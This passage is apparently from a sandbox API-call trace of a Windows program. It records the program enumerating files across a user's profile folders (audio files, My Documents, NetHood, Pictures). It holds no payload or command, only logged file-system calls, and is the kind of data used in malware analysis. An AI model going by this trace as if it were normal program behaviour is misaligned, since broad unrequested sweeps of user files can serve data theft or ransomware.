ftCreationTime.dwLowDateTime=0x6db4f280, ftCreationTime.dwHighDateTime=0x1d5e26f, ftLastAccessTime.dwLowDateTime=0x3e850f20, ftLastAccessTime.dwHighDateTime=0x1d5e75d, ftLastWriteTime.dwLowDateTime=0x3e850f20, ftLastWriteTime.dwHighDateTime=0x1d5e75d, nFileSizeHigh=0x0, nFileSizeLow=0x167c6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7pGOgn9HLFgCIK.m4a", cAlternateFileName="7PGOGN~1.M4A")) returned 1 [0201.046] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf629850, ftCreationTime.dwHighDateTime=0x1d5de99, ftLastAccessTime.dwLowDateTime=0xadcb2480, ftLastAccessTime.dwHighDateTime=0x1d5de27, ftLastWriteTime.dwLowDateTime=0xadcb2480, ftLastWriteTime.dwHighDateTime=0x1d5de27, nFileSizeHigh=0x0, nFileSizeLow=0x6a04, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8_3qpIVlF3_g4a1.wav", cAlternateFileName="8_3QPI~1.WAV")) returned 1 [0201.046] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ad6ed0, ftCreationTime.dwHighDateTime=0x1d5df8f, ftLastAccessTime.dwLowDateTime=0x17f23370, ftLastAccessTime.dwHighDateTime=0x1d5e662, ftLastWriteTime.dwLowDateTime=0x17f23370, ftLastWriteTime.dwHighDateTime=0x1d5e662, nFileSizeHigh=0x0, nFileSizeLow=0x8de7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b1mLIXsHukymODHWvE.m4a", cAlternateFileName="B1MLIX~1.M4A")) returned 1 [0201.046] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d11f570, ftCreationTime.dwHighDateTime=0x1d5df0b, ftLastAccessTime.dwLowDateTime=0xd98881f0, ftLastAccessTime.dwHighDateTime=0x1d5d92f, ftLastWriteTime.dwLowDateTime=0xd98881f0, ftLastWriteTime.dwHighDateTime=0x1d5d92f, nFileSizeHigh=0x0, nFileSizeLow=0x167ec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="d6LmHhUS.wav", cAlternateFileName="")) returned 1 [0201.046] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0201.046] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb60c520, ftCreationTime.dwHighDateTime=0x1d5e5f8, ftLastAccessTime.dwLowDateTime=0x9977aa40, ftLastAccessTime.dwHighDateTime=0x1d5dbce, ftLastWriteTime.dwLowDateTime=0x9977aa40, ftLastWriteTime.dwHighDateTime=0x1d5dbce, nFileSizeHigh=0x0, nFileSizeLow=0x7a8c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dmm6A.wav", cAlternateFileName="")) returned 1 [0201.047] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x526a4560, ftCreationTime.dwHighDateTime=0x1d5e45f, ftLastAccessTime.dwLowDateTime=0xffbde220, ftLastAccessTime.dwHighDateTime=0x1d5dbdc, ftLastWriteTime.dwLowDateTime=0xffbde220, ftLastWriteTime.dwHighDateTime=0x1d5dbdc, nFileSizeHigh=0x0, nFileSizeLow=0x66da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DOiLiV5lxF.wav", cAlternateFileName="DOILIV~1.WAV")) returned 1 [0201.047] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18b20d40, ftCreationTime.dwHighDateTime=0x1d5ddec, ftLastAccessTime.dwLowDateTime=0x2ff914a0, ftLastAccessTime.dwHighDateTime=0x1d5dbc9, ftLastWriteTime.dwLowDateTime=0x2ff914a0, ftLastWriteTime.dwHighDateTime=0x1d5dbc9, nFileSizeHigh=0x0, nFileSizeLow=0xe101, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eMlVnXHfvcxzzTcr.mp3", cAlternateFileName="EMLVNX~1.MP3")) returned 1 [0201.047] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33511550, ftCreationTime.dwHighDateTime=0x1d5e284, ftLastAccessTime.dwLowDateTime=0x12c61b00, ftLastAccessTime.dwHighDateTime=0x1d5da41, ftLastWriteTime.dwLowDateTime=0x12c61b00, ftLastWriteTime.dwHighDateTime=0x1d5da41, nFileSizeHigh=0x0, nFileSizeLow=0x77e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FOZ GswnS.m4a", cAlternateFileName="FOZGSW~1.M4A")) returned 1 [0201.047] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab4cc580, ftCreationTime.dwHighDateTime=0x1d5d9de, ftLastAccessTime.dwLowDateTime=0xa88accc0, ftLastAccessTime.dwHighDateTime=0x1d5e299, ftLastWriteTime.dwLowDateTime=0xa88accc0, ftLastWriteTime.dwHighDateTime=0x1d5e299, nFileSizeHigh=0x0, nFileSizeLow=0xe1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fQRNYm.m4a", cAlternateFileName="")) returned 1 [0201.047] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c399950, ftCreationTime.dwHighDateTime=0x1d5d8fc, ftLastAccessTime.dwLowDateTime=0x7c1b7280, ftLastAccessTime.dwHighDateTime=0x1d5e793, ftLastWriteTime.dwLowDateTime=0x7c1b7280, ftLastWriteTime.dwHighDateTime=0x1d5e793, nFileSizeHigh=0x0, nFileSizeLow=0x188f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gX1KLciA.m4a", cAlternateFileName="")) returned 1 [0201.047] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ca5de80, ftCreationTime.dwHighDateTime=0x1d5d944, ftLastAccessTime.dwLowDateTime=0xc78d640, ftLastAccessTime.dwHighDateTime=0x1d5e057, ftLastWriteTime.dwLowDateTime=0xc78d640, ftLastWriteTime.dwHighDateTime=0x1d5e057, nFileSizeHigh=0x0, nFileSizeLow=0x15f97, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H6AAML5ic7p-F.mp3", cAlternateFileName="H6AAML~1.MP3")) returned 1 [0201.047] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a215100, ftCreationTime.dwHighDateTime=0x1d5dd51, ftLastAccessTime.dwLowDateTime=0xb218d970, ftLastAccessTime.dwHighDateTime=0x1d5dcd7, ftLastWriteTime.dwLowDateTime=0xb218d970, ftLastWriteTime.dwHighDateTime=0x1d5dcd7, nFileSizeHigh=0x0, nFileSizeLow=0x10c1c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IFpoTZFb.wav", cAlternateFileName="")) returned 1 [0201.047] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd511f6a0, ftCreationTime.dwHighDateTime=0x1d5dca0, ftLastAccessTime.dwLowDateTime=0x2852ad60, ftLastAccessTime.dwHighDateTime=0x1d5e0bf, ftLastWriteTime.dwLowDateTime=0x2852ad60, ftLastWriteTime.dwHighDateTime=0x1d5e0bf, nFileSizeHigh=0x0, nFileSizeLow=0x17850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jR1AF6IsbszDHd9hdDak.wav", cAlternateFileName="JR1AF6~1.WAV")) returned 1 [0201.047] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x225815f0, ftCreationTime.dwHighDateTime=0x1d5df55, ftLastAccessTime.dwLowDateTime=0x33c2e6e0, ftLastAccessTime.dwHighDateTime=0x1d5dc16, ftLastWriteTime.dwLowDateTime=0x33c2e6e0, ftLastWriteTime.dwHighDateTime=0x1d5dc16, nFileSizeHigh=0x0, nFileSizeLow=0x82ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="K1B2Jfw.wav", cAlternateFileName="")) returned 1 [0201.047] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x131efc30, ftCreationTime.dwHighDateTime=0x1d5d94b, ftLastAccessTime.dwLowDateTime=0xab96cc50, ftLastAccessTime.dwHighDateTime=0x1d5d869, ftLastWriteTime.dwLowDateTime=0xab96cc50, ftLastWriteTime.dwHighDateTime=0x1d5d869, nFileSizeHigh=0x0, nFileSizeLow=0x16d80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MVYeTXd9U88AMVQ.m4a", cAlternateFileName="MVYETX~1.M4A")) returned 1 [0201.047] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x590e170, ftCreationTime.dwHighDateTime=0x1d5e236, ftLastAccessTime.dwLowDateTime=0x91915300, ftLastAccessTime.dwHighDateTime=0x1d5dc12, ftLastWriteTime.dwLowDateTime=0x91915300, ftLastWriteTime.dwHighDateTime=0x1d5dc12, nFileSizeHigh=0x0, nFileSizeLow=0xe504, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nySkjpIqAgpx1qi.wav", cAlternateFileName="NYSKJP~1.WAV")) returned 1 [0201.047] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fcac760, ftCreationTime.dwHighDateTime=0x1d5e5af, ftLastAccessTime.dwLowDateTime=0x8871bdd0, ftLastAccessTime.dwHighDateTime=0x1d5deda, ftLastWriteTime.dwLowDateTime=0x8871bdd0, ftLastWriteTime.dwHighDateTime=0x1d5deda, nFileSizeHigh=0x0, nFileSizeLow=0x10579, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="O7D12rpnDK7.wav", cAlternateFileName="O7D12R~1.WAV")) returned 1 [0201.047] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadb23eb0, ftCreationTime.dwHighDateTime=0x1d5debe, ftLastAccessTime.dwLowDateTime=0x42f53f10, ftLastAccessTime.dwHighDateTime=0x1d5e52f, ftLastWriteTime.dwLowDateTime=0x42f53f10, ftLastWriteTime.dwHighDateTime=0x1d5e52f, nFileSizeHigh=0x0, nFileSizeLow=0xcd0c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="odacb09i75Hk.m4a", cAlternateFileName="ODACB0~1.M4A")) returned 1 [0201.047] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fc7ef20, ftCreationTime.dwHighDateTime=0x1d5e823, ftLastAccessTime.dwLowDateTime=0x98748c90, ftLastAccessTime.dwHighDateTime=0x1d5de07, ftLastWriteTime.dwLowDateTime=0x98748c90, ftLastWriteTime.dwHighDateTime=0x1d5de07, nFileSizeHigh=0x0, nFileSizeLow=0x953a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OHeX4.wav", cAlternateFileName="")) returned 1 [0201.047] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0216a0, ftCreationTime.dwHighDateTime=0x1d5e814, ftLastAccessTime.dwLowDateTime=0xed84df40, ftLastAccessTime.dwHighDateTime=0x1d5d98a, ftLastWriteTime.dwLowDateTime=0xed84df40, ftLastWriteTime.dwHighDateTime=0x1d5d98a, nFileSizeHigh=0x0, nFileSizeLow=0xdffa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="q88sc5F3DUn.wav", cAlternateFileName="Q88SC5~1.WAV")) returned 1 [0201.047] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0396840, ftCreationTime.dwHighDateTime=0x1d5e50c, ftLastAccessTime.dwLowDateTime=0xb564f200, ftLastAccessTime.dwHighDateTime=0x1d5dce9, ftLastWriteTime.dwLowDateTime=0xb564f200, ftLastWriteTime.dwHighDateTime=0x1d5dce9, nFileSizeHigh=0x0, nFileSizeLow=0x18d2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RGhn4WlYabIEdu76Vetx.wav", cAlternateFileName="RGHN4W~1.WAV")) returned 1 [0201.047] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3104300, ftCreationTime.dwHighDateTime=0x1d5de3c, ftLastAccessTime.dwLowDateTime=0x86325960, ftLastAccessTime.dwHighDateTime=0x1d5e7d3, ftLastWriteTime.dwLowDateTime=0x86325960, ftLastWriteTime.dwHighDateTime=0x1d5e7d3, nFileSizeHigh=0x0, nFileSizeLow=0x460e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RkP8Cvb.mp3", cAlternateFileName="")) returned 1 [0201.047] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb4b5f30, ftCreationTime.dwHighDateTime=0x1d5e154, ftLastAccessTime.dwLowDateTime=0xf4ded0, ftLastAccessTime.dwHighDateTime=0x1d5d7e8, ftLastWriteTime.dwLowDateTime=0xf4ded0, ftLastWriteTime.dwHighDateTime=0x1d5d7e8, nFileSizeHigh=0x0, nFileSizeLow=0x66c3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RUu-fvF.m4a", cAlternateFileName="")) returned 1 [0201.047] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe641190, ftCreationTime.dwHighDateTime=0x1d5e322, ftLastAccessTime.dwLowDateTime=0x42954c90, ftLastAccessTime.dwHighDateTime=0x1d5e241, ftLastWriteTime.dwLowDateTime=0x42954c90, ftLastWriteTime.dwHighDateTime=0x1d5e241, nFileSizeHigh=0x0, nFileSizeLow=0xa606, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sbt0zxWRYObY0T.mp3", cAlternateFileName="SBT0ZX~1.MP3")) returned 1 [0201.047] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46034970, ftCreationTime.dwHighDateTime=0x1d5da5a, ftLastAccessTime.dwLowDateTime=0x2dd71ac0, ftLastAccessTime.dwHighDateTime=0x1d5dc94, ftLastWriteTime.dwLowDateTime=0x2dd71ac0, ftLastWriteTime.dwHighDateTime=0x1d5dc94, nFileSizeHigh=0x0, nFileSizeLow=0x2c2e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TBZjJjm8Supb.mp3", cAlternateFileName="TBZJJJ~1.MP3")) returned 1 [0201.047] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe554bd60, ftCreationTime.dwHighDateTime=0x1d5e509, ftLastAccessTime.dwLowDateTime=0xdf434c50, ftLastAccessTime.dwHighDateTime=0x1d5e641, ftLastWriteTime.dwLowDateTime=0xdf434c50, ftLastWriteTime.dwHighDateTime=0x1d5e641, nFileSizeHigh=0x0, nFileSizeLow=0x17cf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TC y_9-Zb7kJ.mp3", cAlternateFileName="TCY_9-~1.MP3")) returned 1 [0201.047] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc8c1840, ftCreationTime.dwHighDateTime=0x1d5e5a2, ftLastAccessTime.dwLowDateTime=0x579132f0, ftLastAccessTime.dwHighDateTime=0x1d5e375, ftLastWriteTime.dwLowDateTime=0x579132f0, ftLastWriteTime.dwHighDateTime=0x1d5e375, nFileSizeHigh=0x0, nFileSizeLow=0x84d6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="u02f.wav", cAlternateFileName="")) returned 1 [0201.047] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca11a350, ftCreationTime.dwHighDateTime=0x1d5d9b1, ftLastAccessTime.dwLowDateTime=0xc2275220, ftLastAccessTime.dwHighDateTime=0x1d5e7a3, ftLastWriteTime.dwLowDateTime=0xc2275220, ftLastWriteTime.dwHighDateTime=0x1d5e7a3, nFileSizeHigh=0x0, nFileSizeLow=0xd6bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UCaiPZ4.wav", cAlternateFileName="")) returned 1 [0201.047] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf454e1f0, ftCreationTime.dwHighDateTime=0x1d5db5e, ftLastAccessTime.dwLowDateTime=0x20b1bad0, ftLastAccessTime.dwHighDateTime=0x1d5d974, ftLastWriteTime.dwLowDateTime=0x20b1bad0, ftLastWriteTime.dwHighDateTime=0x1d5d974, nFileSizeHigh=0x0, nFileSizeLow=0xf52d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uoP6wD.mp3", cAlternateFileName="")) returned 1 [0201.047] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe91fec60, ftCreationTime.dwHighDateTime=0x1d5e80d, ftLastAccessTime.dwLowDateTime=0x207a6de0, ftLastAccessTime.dwHighDateTime=0x1d5d916, ftLastWriteTime.dwLowDateTime=0x207a6de0, ftLastWriteTime.dwHighDateTime=0x1d5d916, nFileSizeHigh=0x0, nFileSizeLow=0x12b13, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uRbtjou9eX9oaPptUC.m4a", cAlternateFileName="URBTJO~1.M4A")) returned 1 [0201.047] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x638955e0, ftCreationTime.dwHighDateTime=0x1d5e737, ftLastAccessTime.dwLowDateTime=0x9851bb30, ftLastAccessTime.dwHighDateTime=0x1d5e24d, ftLastWriteTime.dwLowDateTime=0x9851bb30, ftLastWriteTime.dwHighDateTime=0x1d5e24d, nFileSizeHigh=0x0, nFileSizeLow=0xa22b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VW1UqmIAHdW7i.wav", cAlternateFileName="VW1UQM~1.WAV")) returned 1 [0201.047] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1f26820, ftCreationTime.dwHighDateTime=0x1d5dc20, ftLastAccessTime.dwLowDateTime=0x5e9b3380, ftLastAccessTime.dwHighDateTime=0x1d5e61c, ftLastWriteTime.dwLowDateTime=0x5e9b3380, ftLastWriteTime.dwHighDateTime=0x1d5e61c, nFileSizeHigh=0x0, nFileSizeLow=0x786c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xVVIlnstf9.wav", cAlternateFileName="XVVILN~1.WAV")) returned 1 [0201.047] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a6e0470, ftCreationTime.dwHighDateTime=0x1d5e5a8, ftLastAccessTime.dwLowDateTime=0xaea4bd00, ftLastAccessTime.dwHighDateTime=0x1d5e348, ftLastWriteTime.dwLowDateTime=0xaea4bd00, ftLastWriteTime.dwHighDateTime=0x1d5e348, nFileSizeHigh=0x0, nFileSizeLow=0x115a6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YBOIpo.m4a", cAlternateFileName="")) returned 1 [0201.047] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a6e0470, ftCreationTime.dwHighDateTime=0x1d5e5a8, ftLastAccessTime.dwLowDateTime=0xaea4bd00, ftLastAccessTime.dwHighDateTime=0x1d5e348, ftLastWriteTime.dwLowDateTime=0xaea4bd00, ftLastWriteTime.dwHighDateTime=0x1d5e348, nFileSizeHigh=0x0, nFileSizeLow=0x115a6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YBOIpo.m4a", cAlternateFileName="")) returned 0 [0201.047] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c35d0 | out: hHeap=0x2c0000) returned 1 [0201.048] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.048] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="My Documents\\" [0201.048] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.048] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.048] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.048] PathFindFileNameW (pszPath="") returned="" [0201.048] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a6e0470, ftCreationTime.dwHighDateTime=0x1d5e5a8, ftLastAccessTime.dwLowDateTime=0xaea4bd00, ftLastAccessTime.dwHighDateTime=0x1d5e348, ftLastWriteTime.dwLowDateTime=0xaea4bd00, ftLastWriteTime.dwHighDateTime=0x1d5e348, nFileSizeHigh=0x0, nFileSizeLow=0x115a6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YBOIpo.m4a", cAlternateFileName="")) returned 0xffffffff [0201.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3846b8 | out: hHeap=0x2c0000) returned 1 [0201.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0201.048] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.048] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="NetHood\\" [0201.048] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.048] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.048] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.048] PathFindFileNameW (pszPath="") returned="" [0201.048] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a6e0470, ftCreationTime.dwHighDateTime=0x1d5e5a8, ftLastAccessTime.dwLowDateTime=0xaea4bd00, ftLastAccessTime.dwHighDateTime=0x1d5e348, ftLastWriteTime.dwLowDateTime=0xaea4bd00, ftLastWriteTime.dwHighDateTime=0x1d5e348, nFileSizeHigh=0x0, nFileSizeLow=0x115a6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YBOIpo.m4a", cAlternateFileName="")) returned 0xffffffff [0201.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3628 | out: hHeap=0x2c0000) returned 1 [0201.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c35d0 | out: hHeap=0x2c0000) returned 1 [0201.049] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.049] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0201.049] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.049] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.049] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.049] PathFindFileNameW (pszPath="") returned="" [0201.049] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdad377e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdad377e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0201.049] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdad377e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdad377e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.049] FindNextFileW (in: 